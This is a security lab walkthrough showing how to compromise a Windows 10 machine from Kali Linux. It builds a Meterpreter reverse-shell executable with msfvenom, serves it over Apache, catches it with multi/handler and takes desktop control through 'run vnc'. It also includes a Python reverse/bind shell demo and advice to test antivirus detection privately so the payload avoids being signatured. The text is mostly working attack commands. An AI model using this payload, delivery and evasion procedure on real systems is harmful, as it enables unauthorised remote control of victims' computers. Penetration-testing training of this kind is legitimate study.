Attackers use client-side vulnerabilities to exploit unpatched software on a user's machine (or, as in this lab, trick the user into running a malicious executable), thereby gaining access to the machine on which that software is installed.
VNC enables attackers to remotely access and control targeted computers from another computer or mobile device, wherever in the world they are. At the same time, it is also used legitimately by administrators and organizations in every industry sector for a range of scenarios and use cases, including providing IT desktop support to colleagues and friends, and accessing systems and services while on the move.
- How to exploit client-side vulnerabilities and establish a VNC session.
- Kali Linux virtual machine (Attacker).
- Windows 10 virtual machine (Target).
Launch Kali Linux, open a terminal window, and type:
msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST=10.0.2.42 LPORT=444 -o /root/Desktop/Test.exe
Note: LHOST is the IP address of your Kali machine.
This command generates Test.exe, a malicious file on the Desktop, as shown below:
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes
Saved as: /root/Desktop/Test.exe
You can also do this from within msfconsole.
To check how detectable the file you created is, go to https://nodistribute.com/ or https://antiscan.me and upload it:
These sites scan the file against more than 20 antivirus engines without sharing the sample. Do not upload your backdoors, or any other file you want to keep private, to VirusTotal, because it distributes uploaded samples to antivirus vendors, and your payload will be signatured shortly afterwards.
Now create a directory from which to share this file with the target machine, set its permissions, and copy the file from the Desktop to the shared location:
Create a directory inside the Apache html folder:
mkdir /var/www/html/share/
Change the mode for the share to 755:
chmod -R 755 /var/www/html/share/
Change the ownership of that folder to www-data:
chown -R www-data:www-data /var/www/html/share/
Now copy the malicious file to the shared location:
cp /root/Desktop/Test.exe /var/www/html/share/
Next, start the apache service:
service apache2 start
Open a new terminal window and type msfconsole to launch the Metasploit Framework.
Use multi/handler to catch the session. In msfconsole:
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.2.42
set LPORT 444
exploit
LHOST is your Kali IP address, and LPORT must match the value you gave to msfvenom (444 here); otherwise the payload will connect to a port nobody is listening on.
A reverse shell (also known as a connect-back shell) is the exact opposite of a bind shell: the attacker first sets up a listener on their own machine, the target machine acts as a client connecting out to that listener, and the attacker then receives the shell. This is why multi/handler must be running before Test.exe is executed on the target, and why the payload still works when the target sits behind NAT or a firewall that blocks inbound connections but allows outbound ones.
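To make the direction of the connection concrete, here is an added illustration (not code from the original page, and not how Metasploit is implemented) that models both shell types on the loopback interface: a tiny Python stand-in for the multi/handler listener and the Test.exe payload. The "shell" only executes one command line per connection via subprocess, and the host, port selection and command are all assumptions chosen for the demo.

```python
"""Connect-back (reverse) shell versus bind shell, both on 127.0.0.1.

Added example, not from the original page: a minimal stand-in for the
multi/handler listener (attacker side) and the msfvenom payload (target
side). Each 'shell' reads a single command line, runs it without an
interactive shell, and returns its stdout; it exists only to show which
side listens and which side connects in each model.
"""
import shlex
import socket
import subprocess
import threading

HOST = "127.0.0.1"  # assumption: loopback only; the lab uses the Kali IP as LHOST


def serve_one_command(conn: socket.socket) -> None:
    """Target side: read one command line, execute it, send stdout back."""
    with conn:
        cmd = conn.recv(4096).decode()
        try:
            out = subprocess.run(shlex.split(cmd), capture_output=True,
                                 text=True, timeout=10).stdout
        except (OSError, subprocess.TimeoutExpired, ValueError) as exc:
            out = f"error: {exc}\n"
        conn.sendall(out.encode())
        conn.shutdown(socket.SHUT_WR)  # EOF tells the attacker the output is complete


def attacker_drive(conn: socket.socket, cmd: str) -> str:
    """Attacker side: send a command over an established connection, collect output."""
    with conn:
        conn.sendall(cmd.encode())
        chunks = []
        while True:
            data = conn.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode()


def reverse_shell_demo(cmd: str) -> str:
    """Reverse shell: the attacker listens first (like multi/handler),
    then the target opens an OUTBOUND connection back to it."""
    listener = socket.socket()
    listener.bind((HOST, 0))           # port 0: let the OS pick a free port
    listener.listen(1)
    lhost, lport = listener.getsockname()

    def target():
        # The payload's only network action is an outbound connect to LHOST:LPORT,
        # which is why it passes through NAT and inbound-blocking firewalls.
        serve_one_command(socket.create_connection((lhost, lport)))

    t = threading.Thread(target=target)
    t.start()
    conn, _ = listener.accept()        # handler receives the connect-back
    listener.close()
    out = attacker_drive(conn, cmd)
    t.join()
    return out


def bind_shell_demo(cmd: str) -> str:
    """Bind shell: the target listens on a port, and the attacker must be able
    to reach that port with an INBOUND connection."""
    listener = socket.socket()
    listener.bind((HOST, 0))
    listener.listen(1)
    thost, tport = listener.getsockname()

    def target():
        conn, _ = listener.accept()    # target waits for the attacker to come in
        listener.close()
        serve_one_command(conn)

    t = threading.Thread(target=target)
    t.start()
    attacker_conn = socket.create_connection((thost, tport))  # inbound to the target
    out = attacker_drive(attacker_conn, cmd)
    t.join()
    return out


if __name__ == "__main__":
    print("reverse shell output:", reverse_shell_demo("echo connect-back ok"), end="")
    print("bind shell output:   ", bind_shell_demo("echo bind ok"), end="")
```

In the reverse case the listener must already exist when the target runs, exactly as multi/handler must be started before Test.exe is launched; if you start the handler afterwards, the payload's connect attempt simply fails and nothing is logged on the Kali side.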
For comparison, a browser-based client-side exploit module in Metasploit is described in its own documentation as follows: this module exploits a memory corruption vulnerability within Microsoft's HTML engine (mshtml). When parsing an HTML page containing a recursive CSS import, a C++ object is deleted and later reused. This lab instead relies on the user running a standalone executable.
On the Windows 10 target, remember to disable Windows Defender (including real-time protection) before continuing: the payload generated above is unencoded and will otherwise be detected and removed as soon as it is downloaded.
Launch the browser on the target, enter the IP address of the Kali machine that is running the Apache web server, and download Test.exe.
In my case the URL is http://10.0.2.42/share
Double click Test.exe.
You will get a Security Warning window; click Run.
Switch to the Kali Linux machine and check whether a Meterpreter session has opened, as shown below:
Meterpreter is a Metasploit attack payload that provides an interactive shell from which an attacker can explore the target machine and execute code.
Useful commands: https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/
About Meterpreter: https://doubleoctopus.com/security-wiki/threats-and-tools/meterpreter/
Now you can open a VNC session to the Windows 10 machine remotely from the Meterpreter prompt by typing:
run vnc
This script uploads a VNC server component to the target through the existing session and launches vncviewer on Kali, so vncviewer must be installed locally. It opens a VNC session to the target's desktop, as shown below:
Useful links: